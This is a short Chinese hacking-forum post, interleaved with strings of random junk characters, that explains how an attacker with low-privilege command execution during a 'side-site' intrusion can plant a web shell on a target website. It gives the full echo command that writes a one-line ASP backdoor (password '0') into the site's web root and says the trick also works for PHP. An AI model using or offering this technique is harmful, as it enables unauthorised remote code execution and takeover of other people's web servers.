在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
% Z. Q( J9 z8 f. D1 N( O) D+ o- v/ O9 Y0 c- d2 ^
命令格式
$ r7 Z2 S1 k. s: @. V+ e& y/ q/ i; [) G7 V
Echo 语句 >目标站绝对目录
0 L- b; m" l, ?) d0 C, ^
1 N% i3 X6 p1 l, K) |例如:
9 i; H! n& b4 y+ }, S% u3 F$ Y& M) f" z; ^
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp4 E$ N0 ?# a* r: o
8 Q2 \: c2 f) N# o
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。, j% F7 q6 e+ y+ ~; }
|